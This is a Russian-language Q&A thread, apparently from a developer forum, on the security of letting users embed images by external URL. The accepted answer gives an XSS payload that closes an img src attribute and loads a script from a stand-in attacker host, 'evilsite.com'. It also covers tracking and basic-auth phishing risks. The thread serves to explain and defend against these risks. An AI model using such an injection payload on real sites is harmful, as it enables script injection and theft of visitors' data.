# Безопасность загрузки изображений в DOM-структуру страницы

Tags: javascript, html, безопасность, dom

**Добрый день!**

Предположим, на некотором сайте пользователям разрешена загрузка( установка ) каких-либо изображений по URL, т.е для получения некоего изображения используется не прямая загрузка, а загрузка по URL со сторонних ресурсов. Собственно, безопасно ли это? Может ли быть такое, что спустя некоторое время по URL`у изображения не будет доступно целевое изображение, но зато будет находиться некий вредоносный код, к примеру. Подгрузится ли такой код и будет ли работать внутри DOM ?

**Благодарю!**

Comment: опасность только со  стороны багов браузера (точнее декодера картинки) кажется такое было с IE одно время. вот [нашел в опере](http://www.opera.com/ru/security/advisory/926)

Comment: Да-да, вот, собственно, как раз в этом суть вопроса и заключается. Т.е, в любом случае, мультимедийные данные(изображения), которые придут по запросу и ответственность за их корректную(безопасную) обработку(декодировку) возлагается только на плечи браузера?

---
Да уж, а с IE вообще беда - такую серьезную уязвимость исправили совсем недавно( 11 марта 2014 г. )...

Comment: 0xFF - да, но это касается в общем-то всего... в случае с багом выполнения кода, никто не помешает сделать такой код, который заставит браузер открыть ваш сайт по-новой и получить все важные данные.

Answer (score 2, accepted):

Если полученный URL подставляется на страницу именно как URL изображение (< img src='someurl'>) и заведомо известно что это корректный URL, а не что-то вроде:

```
http://example.com/good-kitty.jpg'><script src="http://evilsite.com/evil.js" type="text/javascript"></script>
```

который при подстановке в код

```
<img src='someurl'>
```

даст код

```
<img src='http://example.com/good-kitty.jpg'><script src="http://evilsite.com/evil.js" type="text/javascript"></script>'>
```

который покажет хорошего котёнка и выполнит не очень хороший js.

За вычетом этого остаются, пожалуй, только три проблемы:

1) Уязвимость в декодере изображений. Штука всё-таки достаточно редкая.

2) Возможность отслеживать посещения страницы на которой размещена картинка. Посетители страницы будут отправлять GET запрос на сервер example.com который будет содержать их useragent, адрес страницы на которой размещена картинка, ну и естественно запрос придёт с IP пользователя. Само по себе это не бог-весть какая проблема, но в некоторых случаях это может быть нежелательно.

3) Злоумышленник может настроить свой сервер (на который ведёт URL изображения) на запрос базовой http-аутентификации (реализуется браузерами как всплывающее окно с запросом логина и пароля). Посетитель может неподумавши ввести туда логин и пароль от вашего сайта, и они отправятся на сервер злоумышленника. Вроде такое проделывали в комментариях у топовых блогеров в ЖЖ.

Мой вывод такой: конечно лучше так не делать, но в общем-то в некоторых случаях можно использовать такой метод и не париться.

Более безопасная и замороченная альтернатива: утаскивать такие изображения на свой сервер, проверять что это действительно изображения (возможно переконвертировать их) и подставлять в HTML уже свой URL. Например вконтакт поступает таким образом с превьюшками ссылок.